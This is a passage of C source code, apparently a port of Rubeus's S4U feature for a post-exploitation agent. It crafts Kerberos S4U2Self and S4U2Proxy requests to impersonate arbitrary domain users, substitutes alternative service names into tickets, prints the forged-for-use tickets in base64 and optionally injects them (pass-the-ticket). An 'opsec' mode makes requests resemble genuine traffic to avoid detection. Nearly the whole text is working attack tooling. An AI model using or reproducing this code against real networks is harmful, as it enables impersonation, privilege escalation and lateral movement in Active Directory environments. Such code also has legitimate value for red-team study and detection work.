            restrictions.restriction = ADRestrictionEntry_buildTokenStruct(1, 8192);

            ADKerbLocal kerbLocal = { 0 };
            kerbLocal.ad_type = 142; // KERB_LOCAL
            kerbLocal.ad_data_length = 16;
            kerbLocal.ad_data = MemAlloc(16);
            ADVAPI32$SystemFunction036(kerbLocal.ad_data, 16);

            ifrelevant.ADData[0] = &restrictions;
            ifrelevant.ADData[1] = &kerbLocal;

            AsnElt authDataSeq = { 0 }, authDataSeqContext = { 0 };
            if (AsnADIfRelevantEncode(&ifrelevant, &authDataSeq)) return TRUE;
            if (Make3(ASN_SEQUENCE, &authDataSeq, 1, &authDataSeqContext)) return TRUE;

            byte* authorizationDataBytes = NULL;
            int authorizationDataBytesLegth = 0;
            if (AsnToBytesEncode(&authDataSeqContext, &authorizationDataBytesLegth, &authorizationDataBytes)) return TRUE;

            req.req_body.enc_authorization_data.etype = clientKey.key_type;

            byte* enc_authorization_data = NULL;
            int enc_authorization_data_length = 0;
            if (encrypt(authorizationDataBytes, authorizationDataBytesLegth, clientKey.key_value, clientKey.key_type, KRB_KEY_USAGE_TGS_REQ_ENC_AUTHOIRZATION_DATA,
                        &(req.req_body.enc_authorization_data.cipher), &(req.req_body.enc_authorization_data.cipher_size))) return TRUE;
        }

        // S4U requests have a till time of 15 minutes in the future
        if (s4uUser)
            req.req_body.till = 900; // + 15 min

        // encode req_body for authenticator cksum
        AsnElt req_Body_ASN = { 0 }, req_Body_ASNSeq = { 0 }, req_Body_ASNSeqContext = { 0 };
        if (AsnKDCReqBodyEncode(&(req.req_body), &req_Body_ASN)) return TRUE;
        if (Make3(ASN_SEQUENCE, &req_Body_ASN, 1, &req_Body_ASNSeq)) return TRUE;
        if (MakeImplicit(ASN_CONTEXT, 4, &req_Body_ASNSeq, &req_Body_ASNSeqContext)) return TRUE;

        int req_Body_Bytes_length = ValueLength(&req_Body_ASNSeqContext);
        byte* req_Body_Bytes = MemAlloc(req_Body_Bytes_length);
        req_Body_Bytes_length = EncodeValue(&req_Body_ASNSeqContext, 0, req_Body_Bytes_length, req_Body_Bytes, 0);

        checksum(clientKey.key_value, clientKey.key_size, req_Body_Bytes, req_Body_Bytes_length, KERB_CHECKSUM_RSA_MD5, KRB_KEY_USAGE_KRB_NON_KERB_CKSUM_SALT, &cksum_Bytes, &cksum_Bytes_length);
    }

    // create the PA-DATA that contains the AP-REQ w/ appropriate authenticator/etc.
    PA_DATA padata = { 0 };
    if (New_PA_DATA(domain, userName, providedTicket, clientKey, opsec, cksum_Bytes, cksum_Bytes_length, &padata)) return TRUE;

    req.pa_data_count = 1 + (opsec && s4uUser) + (s4uUser || opsec || (tgs && !u2u)) + keyList;
    int padata_index = 0;
    req.pa_data = MemAlloc(req.pa_data_count * sizeof(PA_DATA));
    req.pa_data[padata_index++] = padata;

    // Add PA-DATA for KeyList request
    if (keyList) {
        PA_DATA keyListPaData = { 0 };
        if (New_PA_DATA_KeyListReq(rc4_hmac, &keyListPaData)) return TRUE;
        req.pa_data[padata_index++] = keyListPaData;
    }

    if (opsec && s4uUser) {
        // real packets seem to lowercase the domain in these 2 PA_DATA's
        StrToLower(domain);
        PA_DATA s4upadata = { 0 };
        if (New_PA_DATA_s4uX509user(clientKey, s4uUser, domain, req.req_body.nonce, clientKey.key_type, &s4upadata)) return TRUE;
        req.pa_data[padata_index++] = s4upadata;
    }

    // add final S4U PA-DATA
    if (s4uUser) {
        // constrained delegation yo'
        PA_DATA s4upadata = { 0 };
        if (New_PA_DATA_s4u2self(clientKey, s4uUser, domain, &s4upadata)) return TRUE;
        req.pa_data[padata_index++] = s4upadata;
    }
    else if (opsec) {
        PA_DATA padataoptions = { 0 };
        if (New_PA_DATA_options(FALSE, TRUE, FALSE, FALSE, &padataoptions)) return TRUE;
        req.pa_data[padata_index++] = padataoptions;
    }
    else if (tgs && !u2u) {
        PA_DATA padataoptions = { 0 };
        if (New_PA_DATA_options(FALSE, FALSE, FALSE, TRUE, &padataoptions)) return TRUE;
        req.pa_data[padata_index++] = padataoptions;
    }

    AsnElt reqAsn = { 0 };
    if (ReqToAsnEncode(req, 12, &reqAsn)) return TRUE;
    if (AsnToBytesEncode(&reqAsn, reqBytesSize, reqBytes)) return TRUE;

    if (opsec && s4uUser)
        StrToUpper(domain);

    return FALSE;
}

BOOL S4U2Self(KRB_CRED kirbi, char* targetUser, char* targetSPN, char* domainController, char* altService, BOOL self, BOOL opsec, BOOL ptt, int encType, KRB_CRED* retCred) {
    // extract out the info needed for the TGS-REQ/S4U2Self execution
    char* userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
    char* domain = kirbi.enc_part.ticket_info[0].prealm;
    Ticket ticket = kirbi.tickets[0];
    EncryptionKey clientKey = kirbi.enc_part.ticket_info[0].key;

    PRINT_OUT("[*] Building S4U2self request for: '%s@%s'\n", userName, domain);

    byte* tgsBytes = NULL;
    int	  tgsBytesLength = 0;
    if (NewTGS_REQ(userName, domain, userName, ticket, clientKey, subkey_keymaterial, NULL, opsec, FALSE, FALSE, NULL, targetUser, FALSE, FALSE, /*, roast */ &tgsBytes, &tgsBytesLength)) return TRUE;

    byte* response = NULL;
    int responseSize = 0;
    sendBytes(domainController, "88", tgsBytes, tgsBytesLength, &response, &responseSize);
    if (responseSize == 0)
        return TRUE;

    // decode the supplied bytes to an AsnElt object --- FALSE == ignore trailing garbage
    AsnElt responseAsn = { 0 };
    if (BytesToAsnDecode(response, responseSize, &responseAsn)) return TRUE;

    if (responseAsn.tagValue == KERB_TGS_REP) {
        PRINT_OUT("[+] S4U2self success!\n");

        // parse the response to an TGS-REP
        TGS_REP rep = { 0 };
        if (NewTGS_REP(responseAsn, &rep)) return TRUE;

        byte* outBytes = NULL;
        int  outBytesLength = 0;
        if (decrypt(clientKey.key_value, clientKey.key_type, KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, rep.enc_part.cipher, rep.enc_part.cipher_size, &outBytes, &outBytesLength)) return TRUE;

        AsnElt ae = { 0 };
        if (BytesToAsnDecode(outBytes, outBytesLength, &ae)) return TRUE;

        EncKDCRepPart encRepPart = { 0 };
        if (AsnGetEncKDCRepPart(&(ae.sub[0]), &encRepPart)) return TRUE;

        // now build the final KRB-CRED structure
        KRB_CRED cred = { 0 };
        cred.pvno = 5;
        cred.msg_type = 22;

        // if we want to use this s4u2self ticket for authentication, change the sname
        char** altSnames = 0;
        int altsvcCount = 0;
        if (altService && self) {
            char* altsvc = 0;
            if (my_copybuf(&(altsvc), altService, my_strlen(altService) + 1)) return TRUE;

            altsvcCount = 0;
            altSnames = my_strsplit( altsvc, '/', &altsvcCount );

            if (altsvcCount > 1) {
                rep.ticket.sname.name_count = 2;
                rep.ticket.sname.name_string = MemAlloc(sizeof(void*) * 2);
                if (my_copybuf(&(rep.ticket.sname.name_string[0]), altSnames[0], my_strlen(altSnames[0]) + 1)) return TRUE;
                if (my_copybuf(&(rep.ticket.sname.name_string[1]), altSnames[1], my_strlen(altSnames[1]) + 1)) return TRUE;
            }
        }

        // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
        KrbCredInfo info = { 0 };

        info.key = encRepPart.key;
        if (my_copybuf(&(info.key.key_value), encRepPart.key.key_value, encRepPart.key.key_size)) return TRUE;

        if (my_copybuf(&(info.prealm), rep.crealm, my_strlen(rep.crealm) + 1)) return TRUE;

        info.pname = rep.cname;
        info.pname.name_string = MemAlloc(info.pname.name_count * sizeof(void*));
        for (int i = 0; i < info.pname.name_count; i++)
            if (my_copybuf(&(info.pname.name_string[i]), rep.cname.name_string[i], my_strlen(rep.cname.name_string[i]) + 1)) return TRUE;

        cred.ticket_count = 1;
        cred.tickets = MemAlloc(cred.ticket_count * sizeof(Ticket));
        if (!cred.tickets) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        cred.tickets[0] = rep.ticket;

        info.flags = encRepPart.flags;
        info.starttime = encRepPart.starttime;
        info.endtime = encRepPart.endtime;
        info.renew_till = encRepPart.renew_till;

        if (my_copybuf(&(info.srealm), rep.crealm, my_strlen(rep.crealm) + 1)) return TRUE;

        info.sname = encRepPart.sname;
        info.sname.name_string = MemAlloc(info.sname.name_count * sizeof(void*));
        for (int i = 0; i < info.sname.name_count; i++)
            if (my_copybuf(&(info.sname.name_string[i]), encRepPart.sname.name_string[i], my_strlen(encRepPart.sname.name_string[i]) + 1)) return TRUE;

        // if we want to use the s4u2self change the sname here too
        if (altService && self) {
            PRINT_OUT("[*] Substituting alternative service name '%s'\n", altService);
            if (altsvcCount > 1) {
                info.sname.name_count = 2;
                info.sname.name_string = MemAlloc(sizeof(void*) * 2);
                if (my_copybuf(&(info.sname.name_string[0]), altSnames[0], my_strlen(altSnames[0]) + 1)) return TRUE;
                if (my_copybuf(&(info.sname.name_string[1]), altSnames[1], my_strlen(altSnames[1]) + 1)) return TRUE;

            }
        }

        cred.enc_part.ticket_count = 1;
        cred.enc_part.ticket_info = MemAlloc(cred.enc_part.ticket_count * sizeof(KrbCredInfo));
        if (!cred.enc_part.ticket_info) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        cred.enc_part.ticket_info[0] = info;

        AsnElt asnCred = { 0 };
        if (AsnKrbCredEncode(&cred, &asnCred)) return TRUE;

        byte* kirbiBytes = NULL;
        int   kirbiBytesSize = 0;
        if (AsnToBytesEncode(&asnCred, &kirbiBytesSize, &kirbiBytes)) return TRUE;

        char* kirbiString = base64_encode(kirbiBytes, kirbiBytesSize);

        PRINT_OUT("[*] Got a TGS for '%s' to '%s@%s'\n", info.pname.name_string[0], info.sname.name_string[0], info.srealm);
        PRINT_OUT("[*] base64(ticket.kirbi):\n\n%s\n\n", kirbiString);

        if (ptt && self)
            PTT(NULL, kirbiString);

        *retCred = cred;
        return FALSE;
    }
    else if (responseAsn.tagValue == KERB_ERROR) {
        uint error_code = 0;
        if (AsnGetErrorCode(&(responseAsn.sub[0]), &error_code)) return TRUE;
        PRINT_OUT("\n\t[x] Kerberos error : %d\n", error_code);
    }
    else {
        PRINT_OUT("\n[X] Unknown application tag: %d\n", responseAsn.tagValue);
    }

    return TRUE;
}

BOOL S4U2Proxy(KRB_CRED kirbi, char* targetUser, char* targetSPN, char* domainController, char* altService, KRB_CRED tgs, BOOL opsec, BOOL ptt) {
    PRINT_OUT("[*] Impersonating user '%s' to target SPN '%s'\n", targetUser, targetSPN);
    char** altSnames = 0;
    int altsvcCount = 0;
    if (altService) {
        char* altsvc = 0;
        if (my_copybuf(&(altsvc), altService, my_strlen(altService) + 1)) return TRUE;

        altsvcCount = 0;
        altSnames = my_strsplit( altsvc, ',', &altsvcCount );

        if (altsvcCount == 1)
            PRINT_OUT("[*]   Final ticket will be for the alternate service '%s'\n", altService);
        else
            PRINT_OUT("[*]   Final tickets will be for the alternate services '%s'\n", altService);
    }

    // extract out the info needed for the TGS-REQ/S4U2Proxy execution
    char* userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
    char* domain = kirbi.enc_part.ticket_info[0].prealm;
    Ticket ticket = kirbi.tickets[0];
    EncryptionKey clientKey = kirbi.enc_part.ticket_info[0].key;

    PRINT_OUT("[*] Building S4U2proxy request for service: '%s'\n", targetSPN);

    AS_REQ s4u2proxyReq = { 0 };
    s4u2proxyReq.pvno = 5;
    s4u2proxyReq.msg_type = KERB_TGS_REQ;
    s4u2proxyReq.req_body.kdc_options = FORWARDABLE | RENEWABLE | RENEWABLEOK | CONSTRAINED_DELEGATION;
    if (!opsec) {
        s4u2proxyReq.req_body.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
    }
    s4u2proxyReq.req_body.till = 1 * 3600;   // valid for 1h
    ADVAPI32$SystemFunction036(&(s4u2proxyReq.req_body.nonce), 4);

    if (my_copybuf(&(s4u2proxyReq.req_body.realm), domain, my_strlen(domain) + 1)) return TRUE;

    char* spn = 0;
    if (my_copybuf(&(spn), targetSPN, my_strlen(targetSPN) + 1)) return TRUE;

    int partsCount = 0;
    char** parts = my_strsplit( spn, '/', &partsCount );
    if (partsCount < 2)
        return TRUE;

    char* serverName = parts[partsCount - 1];
    s4u2proxyReq.req_body.sname.name_type = PRINCIPAL_NT_SRV_INST;
    s4u2proxyReq.req_body.sname.name_count = partsCount;
    s4u2proxyReq.req_body.sname.name_string = MemAlloc(sizeof(void*) * s4u2proxyReq.req_body.sname.name_count);
    for (int i = 0; i < partsCount; i++)
        s4u2proxyReq.req_body.sname.name_string[i] = parts[i];

    if (opsec) {
        s4u2proxyReq.req_body.etypes_count = 5;
        s4u2proxyReq.req_body.etypes = MemAlloc(s4u2proxyReq.req_body.etypes_count * sizeof(DWORD));
        s4u2proxyReq.req_body.etypes[0] = aes128_cts_hmac_sha1;
        s4u2proxyReq.req_body.etypes[1] = aes256_cts_hmac_sha1;
        s4u2proxyReq.req_body.etypes[2] = rc4_hmac;
        s4u2proxyReq.req_body.etypes[3] = rc4_hmac_exp;
        s4u2proxyReq.req_body.etypes[4] = old_exp;
    }
    else {
        s4u2proxyReq.req_body.etypes_count = 3;
        s4u2proxyReq.req_body.etypes = MemAlloc(s4u2proxyReq.req_body.etypes_count * sizeof(DWORD));
        s4u2proxyReq.req_body.etypes[0] = aes128_cts_hmac_sha1;
        s4u2proxyReq.req_body.etypes[1] = aes256_cts_hmac_sha1;
        s4u2proxyReq.req_body.etypes[2] = rc4_hmac;
    }

    s4u2proxyReq.req_body.additional_tickets_count = 1;
    s4u2proxyReq.req_body.additional_tickets = MemAlloc(s4u2proxyReq.req_body.additional_tickets_count * sizeof(Ticket));
    s4u2proxyReq.req_body.additional_tickets[0] = tgs.tickets[0];

    byte* cksum_Bytes = NULL;
    int cksum_Bytes_length = 0;

    if (opsec) {
        // remove renewableok and add canonicalize
        s4u2proxyReq.req_body.kdc_options = s4u2proxyReq.req_body.kdc_options ^ (s4u2proxyReq.req_body.kdc_options & RENEWABLEOK);
        s4u2proxyReq.req_body.kdc_options = s4u2proxyReq.req_body.kdc_options | CANONICALIZE;

        // 15 minutes in the future like genuine requests
        s4u2proxyReq.req_body.till = 900;

        // get hostname and hostname of SPN
        int size = MAX_COMPUTERNAME_LENGTH + 2;
        char* hostname = MemAlloc(size);
        if (!hostname) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        KERNEL32$GetComputerNameA(hostname, &size);

        char* targetHostName;
        if (partsCount > 1) {
            int substrIndex = my_strfind(parts[1], '.');
            if (substrIndex < 0)
                substrIndex = my_strlen(parts[1]) + 1;

            my_copybuf(&(targetHostName), parts[1], substrIndex);
            targetHostName[substrIndex] = 0;
            StrToUpper(targetHostName);
        }
        else {
            my_copybuf(&(targetHostName), hostname, my_strlen(hostname) + 1);
        }

        // create enc-authorization-data if target host is not the local machine
        if (my_strcmp(hostname, targetHostName)) {

            ADIfRelevant ifrelevant = { 0 };
            ifrelevant.ad_type = 1;
            ifrelevant.ADData_count = 2;
            ifrelevant.ADData = MemAlloc(2 * sizeof(void*));

            ADRestrictionEntry restrictions = { 0 };
            restrictions.ad_type = 141; // KERB_AUTH_DATA_TOKEN_RESTRICTIONS;
            restrictions.restriction_type = 0;
            restrictions.restriction_length = 40;
            restrictions.restriction = ADRestrictionEntry_buildTokenStruct(1, 8192);

            ADKerbLocal kerbLocal = { 0 };
            kerbLocal.ad_type = 142; // KERB_LOCAL
            kerbLocal.ad_data_length = 16;
            kerbLocal.ad_data = MemAlloc(16);
            ADVAPI32$SystemFunction036(kerbLocal.ad_data, 16);

            ifrelevant.ADData[0] = &restrictions;
            ifrelevant.ADData[1] = &kerbLocal;

            AsnElt authDataSeq = { 0 }, authDataSeqContext = { 0 };
            if (AsnADIfRelevantEncode(&ifrelevant, &authDataSeq)) return TRUE;
            if (Make3(ASN_SEQUENCE, &authDataSeq, 1, &authDataSeqContext)) return TRUE;

            byte* authorizationDataBytes = NULL;
            int authorizationDataBytesLegth = 0;
            if (AsnToBytesEncode(&authDataSeqContext, &authorizationDataBytesLegth, &authorizationDataBytes)) return TRUE;

            s4u2proxyReq.req_body.enc_authorization_data.etype = tgs.enc_part.ticket_info[0].key.key_type;

            byte* enc_authorization_data = NULL;
            int enc_authorization_data_length = 0;
            if (encrypt(authorizationDataBytes, authorizationDataBytesLegth, tgs.enc_part.ticket_info[0].key.key_value, tgs.enc_part.ticket_info[0].key.key_type, KRB_KEY_USAGE_TGS_REQ_ENC_AUTHOIRZATION_DATA,
                        &(s4u2proxyReq.req_body.enc_authorization_data.cipher), &(s4u2proxyReq.req_body.enc_authorization_data.cipher_size))) return TRUE;
        }

        // encode req_body for authenticator cksum
        AsnElt req_Body_ASN = { 0 }, req_Body_ASNSeq = { 0 }, req_Body_ASNSeqContext = { 0 };
        if (AsnKDCReqBodyEncode(&(s4u2proxyReq.req_body), &req_Body_ASN)) return TRUE;
        if (Make3(ASN_SEQUENCE, &req_Body_ASN, 1, &req_Body_ASNSeq)) return TRUE;
        if (MakeImplicit(ASN_CONTEXT, 4, &req_Body_ASNSeq, &req_Body_ASNSeqContext)) return TRUE;

        int req_Body_Bytes_length = ValueLength(&req_Body_ASNSeqContext);
        byte* req_Body_Bytes = MemAlloc(req_Body_Bytes_length);
        req_Body_Bytes_length = EncodeValue(&req_Body_ASNSeqContext, 0, req_Body_Bytes_length, req_Body_Bytes, 0);

        checksum(clientKey.key_value, clientKey.key_size, req_Body_Bytes, req_Body_Bytes_length, KERB_CHECKSUM_RSA_MD5, KRB_KEY_USAGE_KRB_NON_KERB_CKSUM_SALT, &cksum_Bytes, &cksum_Bytes_length);
    }

    // moved to end so we can have the checksum in the authenticator
    PA_DATA padata = { 0 };
    if (New_PA_DATA(domain, userName, ticket, clientKey, opsec, cksum_Bytes, cksum_Bytes_length, &padata)) return TRUE;

    s4u2proxyReq.pa_data_count = 2;
    s4u2proxyReq.pa_data = MemAlloc(s4u2proxyReq.pa_data_count * sizeof(PA_DATA));
    s4u2proxyReq.pa_data[0] = padata;

    PA_DATA pac_options = { 0 };
    if (New_PA_DATA_options(FALSE, FALSE, FALSE, TRUE, &pac_options)) return TRUE;
    s4u2proxyReq.pa_data[1] = pac_options;

    byte* reqBytes = NULL;
    int   reqBytesSize = 0;
    AsnElt s4u2proxyReqAsn = { 0 };
    if (ReqToAsnEncode(s4u2proxyReq, 12, &s4u2proxyReqAsn)) return TRUE;
    if (AsnToBytesEncode(&s4u2proxyReqAsn, &reqBytesSize, &reqBytes)) return TRUE;

    byte* response2 = NULL;
    int response2Size = 0;
    sendBytes(domainController, "88", reqBytes, reqBytesSize, &response2, &response2Size);
    if (response2Size == 0)
        return TRUE;

    // decode the supplied bytes to an AsnElt object --- FALSE == ignore trailing garbage
    AsnElt responseAsn = { 0 };
    if (BytesToAsnDecode(response2, response2Size, &responseAsn)) return TRUE;

    if (responseAsn.tagValue == KERB_TGS_REP) {
        PRINT_OUT("[+] S4U2proxy success!\n");

        TGS_REP rep2 = { 0 };
        if (AsnGetTGS_REP(&responseAsn, &rep2)) return TRUE;

        byte* outBytes2 = NULL;
        int  outBytes2Length = 0;
        if (decrypt(clientKey.key_value, clientKey.key_type, KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, rep2.enc_part.cipher, rep2.enc_part.cipher_size, &outBytes2, &outBytes2Length)) return TRUE;

        AsnElt ae2 = { 0 };
        if (BytesToAsnDecode(outBytes2, outBytes2Length, &ae2)) return TRUE;

        EncKDCRepPart encRepPart2 = { 0 };
        if (AsnGetEncKDCRepPart(&(ae2.sub[0]), &encRepPart2)) return TRUE;

        if (altService) {
            for (int ind = 0; ind < altsvcCount; ind++) {
                // now build the final KRB-CRED structure with one or more alternate snames
                KRB_CRED cred = { 0 };
                cred.pvno = 5;
                cred.msg_type = 22;

                // since we want an alternate sname, first substitute it into the ticket structure
                rep2.ticket.sname.name_string[0] = altSnames[ind];

                cred.ticket_count = 1;
                cred.tickets = MemAlloc(cred.ticket_count * sizeof(Ticket));
                if (!cred.tickets) {
                    PRINT_OUT("[x] Failed alloc memory");
                    return TRUE;
                }
                cred.tickets[0] = rep2.ticket;

                KrbCredInfo info = { 0 };

                info.key = encRepPart2.key;
                if (my_copybuf(&(info.key.key_value), encRepPart2.key.key_value, encRepPart2.key.key_size)) return TRUE;

                if (my_copybuf(&(info.prealm), encRepPart2.realm, my_strlen(encRepPart2.realm) + 1)) return TRUE;

                info.pname = rep2.cname;
                info.pname.name_string = MemAlloc(info.pname.name_count * sizeof(void*));
                for (int i = 0; i < info.pname.name_count; i++)
                    if (my_copybuf(&(info.pname.name_string[i]), rep2.cname.name_string[i], my_strlen(rep2.cname.name_string[i]) + 1)) return TRUE;

                info.flags = encRepPart2.flags;
                info.starttime = encRepPart2.starttime;
                info.endtime = encRepPart2.endtime;
                info.renew_till = encRepPart2.renew_till;

                if (my_copybuf(&(info.srealm), encRepPart2.realm, my_strlen(encRepPart2.realm) + 1)) return TRUE;

                info.sname = encRepPart2.sname;
                info.sname.name_string = MemAlloc(info.sname.name_count * sizeof(void*));
                for (int i = 0; i < info.sname.name_count; i++)
                    if (my_copybuf(&(info.sname.name_string[i]), encRepPart2.sname.name_string[i], my_strlen(encRepPart2.sname.name_string[i]) + 1)) return TRUE;

                // if we want an alternate sname, substitute it into the encrypted portion of the KRB_CRED
                PRINT_OUT("[*] Substituting alternative service name '%s'\n", altSnames[ind]);
                info.sname.name_string[0] = altSnames[ind];

                cred.enc_part.ticket_count = 1;
                cred.enc_part.ticket_info = MemAlloc(cred.enc_part.ticket_count * sizeof(KrbCredInfo));
                if (!cred.enc_part.ticket_info) {
                    PRINT_OUT("[x] Failed alloc memory");
                    return TRUE;
                }
                cred.enc_part.ticket_info[0] = info;

                AsnElt asnCred = { 0 };
                if (AsnKrbCredEncode(&cred, &asnCred)) return TRUE;

                byte* kirbiBytes = NULL;
                int   kirbiBytesSize = 0;
                if (AsnToBytesEncode(&asnCred, &kirbiBytesSize, &kirbiBytes)) return TRUE;

                char* kirbiString = base64_encode(kirbiBytes, kirbiBytesSize);

                PRINT_OUT("[*] base64(ticket.kirbi) for SPN '%s/%s':\n\n", altSnames[ind], serverName);
                PRINT_OUT("%s\n\n", kirbiString);

                if (ptt)
                    PTT(NULL, kirbiString);
            }
        }
        else {
            // now build the final KRB-CRED structure, no alternate snames
            KRB_CRED cred = { 0 };
            cred.pvno = 5;
            cred.msg_type = 22;
            cred.ticket_count = 1;
            cred.tickets = MemAlloc(cred.ticket_count * sizeof(Ticket));
            if (!cred.tickets) {
                PRINT_OUT("[x] Failed alloc memory");
                return TRUE;
            }
            cred.tickets[0] = rep2.ticket;

            KrbCredInfo info = { 0 };

            info.key = encRepPart2.key;
            if (my_copybuf(&(info.key.key_value), encRepPart2.key.key_value, encRepPart2.key.key_size)) return TRUE;

            if (my_copybuf(&(info.prealm), encRepPart2.realm, my_strlen(encRepPart2.realm) + 1)) return TRUE;

            info.pname = rep2.cname;
            info.pname.name_string = MemAlloc(info.pname.name_count * sizeof(void*));
            for (int i = 0; i < info.pname.name_count; i++)
                if (my_copybuf(&(info.pname.name_string[i]), rep2.cname.name_string[i], my_strlen(rep2.cname.name_string[i]) + 1)) return TRUE;

            info.flags = encRepPart2.flags;
            info.starttime = encRepPart2.starttime;
            info.endtime = encRepPart2.endtime;
            info.renew_till = encRepPart2.renew_till;

            if (my_copybuf(&(info.srealm), encRepPart2.realm, my_strlen(encRepPart2.realm) + 1)) return TRUE;

            info.sname = encRepPart2.sname;
            info.sname.name_string = MemAlloc(info.sname.name_count * sizeof(void*));
            for (int i = 0; i < info.sname.name_count; i++)
                if (my_copybuf(&(info.sname.name_string[i]), encRepPart2.sname.name_string[i], my_strlen(encRepPart2.sname.name_string[i]) + 1)) return TRUE;

            cred.enc_part.ticket_count = 1;
            cred.enc_part.ticket_info = MemAlloc(cred.enc_part.ticket_count * sizeof(KrbCredInfo));
            if (!cred.enc_part.ticket_info) {
                PRINT_OUT("[x] Failed alloc memory");
                return TRUE;
            }
            cred.enc_part.ticket_info[0] = info;

            AsnElt asnCred = { 0 };
            if (AsnKrbCredEncode(&cred, &asnCred)) return TRUE;

            byte* kirbiBytes = NULL;
            int   kirbiBytesSize = 0;
            if (AsnToBytesEncode(&asnCred, &kirbiBytesSize, &kirbiBytes)) return TRUE;

            char* kirbiString = base64_encode(kirbiBytes, kirbiBytesSize);

            PRINT_OUT("[*] base64(ticket.kirbi) for SPN '%s':\n\n", targetSPN);
            PRINT_OUT("%s\n\n", kirbiString);

            if (ptt)
                PTT(NULL, kirbiString);
        }
        return FALSE;
    }
    else if (responseAsn.tagValue == KERB_ERROR) {
        uint error_code = 0;
        if (AsnGetErrorCode(&(responseAsn.sub[0]), &error_code)) return TRUE;
        PRINT_OUT("\n\t[x] Kerberos error : %d\n", error_code);
    }
    else {
        PRINT_OUT("\n[X] Unknown application tag: %d\n", responseAsn.tagValue);
    }

    return TRUE;
}

void S4UExecute_Ticket(byte* ticket, char* targetUser, char* targetSPN, char* domainController, char* altService, KRB_CRED tgs, BOOL s, BOOL opsec, BOOL ptt, int encType, char* targetDomainController, char* targetDomain, char* impersonateDomain) {
    int bytesSize = 0;
    byte* bytes = base64_decode(ticket, &bytesSize);

    KRB_CRED kirbi = { 0 };
    AsnElt   asn_KRB_CRED = { 0 };
    if (BytesToAsnDecode3(bytes, bytesSize, FALSE, &asn_KRB_CRED)) return;
    if (AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &kirbi)) return;

    // Cross-domain S4U detection
    if (targetDomain && targetDomainController) {
        PRINT_OUT("[*] Performing cross domain constrained delegation\n");
        PRINT_OUT("[*] Target domain: %s\n", targetDomain);
        PRINT_OUT("[*] Target DC: %s\n", targetDomainController);
        PRINT_OUT("[X] Cross-domain S4U not yet fully implemented. Use standard S4U with referral ticket.\n");
        return;
    }

    if (tgs.enc_part.ticket_count && targetSPN) {
        PRINT_OUT("[*] Loaded a TGS for %s\\%s\n", tgs.enc_part.ticket_info[0].prealm, tgs.enc_part.ticket_info[0].pname.name_string[0]);
        S4U2Proxy(kirbi, targetUser, targetSPN, domainController, altService, tgs, opsec, ptt);
    }
    else {
        KRB_CRED self = {0};
        BOOL r = S4U2Self(kirbi, targetUser, targetSPN, domainController, altService, s, opsec, ptt, encType, &self);
        if (r) {
            PRINT_OUT("[X] S4U2Self failed, unable to perform S4U2Proxy.\n");
            return;
        }
        if (targetSPN)
            S4U2Proxy(kirbi, targetUser, targetSPN, domainController, altService, self, opsec, ptt);
    }
}

void ASK_S4U_RUN( PCHAR Buffer, DWORD Length ) {
    PRINT_OUT("[*] Action: S4U\n\n");

    char* user         = NULL;
    char* domain       = NULL;
    char* dc           = NULL;
    char* hash         = NULL;
    int   encType      = subkey_keymaterial;
    int   curEType     = 0;
    BOOL  ptt          = FALSE;
    BOOL  opsec        = FALSE;
    BOOL  pac          = TRUE;
    BOOL  self         = FALSE;
    char* targetSPN    = NULL;
    byte* ticket       = NULL;
    byte* tgs          = NULL;
    char* altSname     = NULL;
    char* targetUser   = NULL;
    char* targetDomain = NULL;
    char* targetDC     = NULL;
    char* impersonateDomain = NULL;

    for (int i = 0; i < Length; i++) {
        i += GetStrParam(Buffer + i, Length - i, "/user:", 6, &user );
        i += GetStrParam(Buffer + i, Length - i, "/domain:", 8, &domain );
        i += GetStrParam(Buffer + i, Length - i, "/ticket:", 8, &ticket );
        i += GetStrParam(Buffer + i, Length - i, "/dc:", 4, &dc );
        i += GetStrParam(Buffer + i, Length - i, "/service:", 9, &targetSPN );
        i += GetStrParam(Buffer + i, Length - i, "/tgs:", 5, &tgs );
        i += GetStrParam(Buffer + i, Length - i, "/altservice:", 12, &altSname );
        i += GetStrParam(Buffer + i, Length - i, "/impersonateuser:", 17, &targetUser );
        i += GetStrParam(Buffer + i, Length - i, "/targetdomain:", 14, &targetDomain );
        i += GetStrParam(Buffer + i, Length - i, "/targetdc:", 10, &targetDC );
        i += GetStrParam(Buffer + i, Length - i, "/impersonatedomain:", 19, &impersonateDomain );
        i += IsSetParam(Buffer + i, Length - i, "/ptt", 4, &ptt );
        i += IsSetParam(Buffer + i, Length - i, "/opsec", 6, &opsec );
        i += IsSetParam(Buffer + i, Length - i, "/nopac", 6, &pac );
        i += IsSetParam(Buffer + i, Length - i, "/self", 5, &self );
//        int h1 = GetStrParam(Buffer + i, Length - i, "/rc4:", 5, &hash );
//        if(h1){
//            encType = rc4_hmac;
//            curEType = encType;
//        }
//        int h2 = GetStrParam(Buffer + i, Length - i, "/aes256:", 8, &hash );
//        if(h2){
//            encType = aes256_cts_hmac_sha1;
//            curEType = encType;
//        }
    }

    pac = !pac;

    GetDomainInfo(&domain, &dc);
    if (domain == NULL || dc == NULL) {
        PRINT_OUT("[X] Could not retrieve domain information!\n\n");
        return;
    }

    if (targetUser && tgs) {
        PRINT_OUT("\n[X] You must supply either a /impersonateuser or a /tgs, but not both.\n");
        return;
    }

    KRB_CRED kirbi_tgs = { 0 };
    if (tgs) {
        int bytesTgsSize = 0;
        byte* bytesTgs = base64_decode(tgs, &bytesTgsSize);

        AsnElt   asn_KRB_CRED = { 0 };
        if (BytesToAsnDecode3(bytesTgs, bytesTgsSize, FALSE, &asn_KRB_CRED)) return;

        AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &kirbi_tgs);

        targetUser = kirbi_tgs.enc_part.ticket_info[0].pname.name_string[0];
    }
    if (!targetUser && !tgs) {
        PRINT_OUT("\n[X] You must supply a /tgs or /impersonateuser to impersonate!\n");
        return;
    }
    if (!targetSPN && tgs) {
        PRINT_OUT("\n[X] If a /tgs is supplied, you must also supply a /service !\n");
        return;
    }

    if (ticket)
